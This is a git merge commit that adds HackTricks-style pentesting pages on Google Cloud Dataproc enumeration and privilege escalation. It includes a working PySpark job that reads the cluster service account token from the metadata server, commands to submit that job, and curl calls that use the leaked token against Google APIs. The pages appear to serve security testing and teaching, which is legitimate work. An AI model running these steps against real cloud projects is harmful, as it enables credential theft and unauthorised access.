Commit e9f3cb5

Merge pull request #148 from shamo0/master

grte-shamooo

2 parents 0b5ddcc + 6c4f136

2 files changed: +103 −0 lines changed
gcp-privilege-escalation/gcp-dataproc-privesc.md: 56 additions & 0 deletions
@@ -0,0 +1,56 @@
# GCP Dataproc Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataproc

{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}

### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`

I was unable to get a reverse shell using this method; however, it is possible to leak the cluster's SA token from the metadata endpoint as described below.

#### Steps to exploit

- Place the job script in a GCP Storage bucket.
- Submit a job to the Dataproc cluster.
- Use the job to access the metadata server.
- Leak the service account token used by the cluster.
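
The following script, submitted as a PySpark job, queries the instance metadata endpoint from inside the cluster and prints the access token of the attached service account (the printed token ends up in the job's driver output):
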
```python
import requests

# The GCE metadata server is reachable from code running on the cluster VMs
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
headers = {"Metadata-Flavor": "Google"}

def fetch_metadata_token():
    try:
        response = requests.get(metadata_url, headers=headers, timeout=5)
        response.raise_for_status()
        token = response.json().get("access_token", "")
        print(f"Leaked Token: {token}")
        return token
    except Exception as e:
        print(f"Error fetching metadata token: {e}")
        return None

if __name__ == "__main__":
    fetch_metadata_token()
```

```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
    --cluster=<cluster-name> \
    --region=<region>
```
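
`gcloud dataproc jobs submit` streams the driver output back to the terminal, so the leaked token is printed directly. To check what the token is good for, you can query Google's standard OAuth2 `tokeninfo` endpoint and then use it against GCP APIs; a minimal sketch (the bucket-listing call is just one illustrative use):

```bash
# Inspect the scopes and expiry of the leaked token
curl "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=<leaked-token>"

# Example use: list the storage buckets of the project with the leaked token
curl -H "Authorization: Bearer <leaked-token>" \
    "https://storage.googleapis.com/storage/v1/b?project=<project-id>"
```
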
{{#include ../../../banners/hacktricks-training.md}}
gcp-services/gcp-dataproc-enum.md: 47 additions & 0 deletions
@@ -0,0 +1,47 @@
# GCP - Dataproc Enum

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc makes it easy to create clusters for distributed computing and integrates with other Google Cloud Platform (GCP) services such as Cloud Storage, BigQuery, and Cloud Monitoring.

Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.

## Components

A Dataproc cluster typically includes:

- **Master node**: manages cluster resources and coordinates distributed tasks.
- **Worker nodes**: execute the distributed tasks.
- **Service accounts**: handle API calls and access to other GCP services.

## Enumeration

Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information such as service accounts, permissions, and potential misconfigurations.

### Cluster Enumeration

To enumerate Dataproc clusters and retrieve their details:

```bash
gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>
```
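
The `describe` output includes the service account attached to the cluster VMs, which is what a submitted job runs as. A minimal sketch to extract just that field (the `config.gceClusterConfig.serviceAccount` field path comes from the Dataproc API; it is empty when the default compute service account is used):

```bash
# Print only the service account attached to the cluster VMs
gcloud dataproc clusters describe <cluster-name> --region=<region> \
    --format="value(config.gceClusterConfig.serviceAccount)"
```
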
### Job Enumeration

```bash
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
```
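
Job details also expose the submitted script and where the driver output is stored; reading that output from the bucket can reveal anything a job printed, such as a leaked token. A minimal sketch (the `driverOutputResourceUri` field name comes from the Dataproc API, and the driver output is stored as files under that prefix):

```bash
# Locate the driver output of a job and read it from the bucket
OUTPUT_URI=$(gcloud dataproc jobs describe <job-id> --region=<region> \
    --format="value(driverOutputResourceUri)")
gsutil cat "${OUTPUT_URI}*"
```
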
### Privesc

{{#ref}}
../gcp-privilege-escalation/gcp-dataproc-privesc.md
{{#endref}}

{{#include ../../../banners/hacktricks-training.md}}
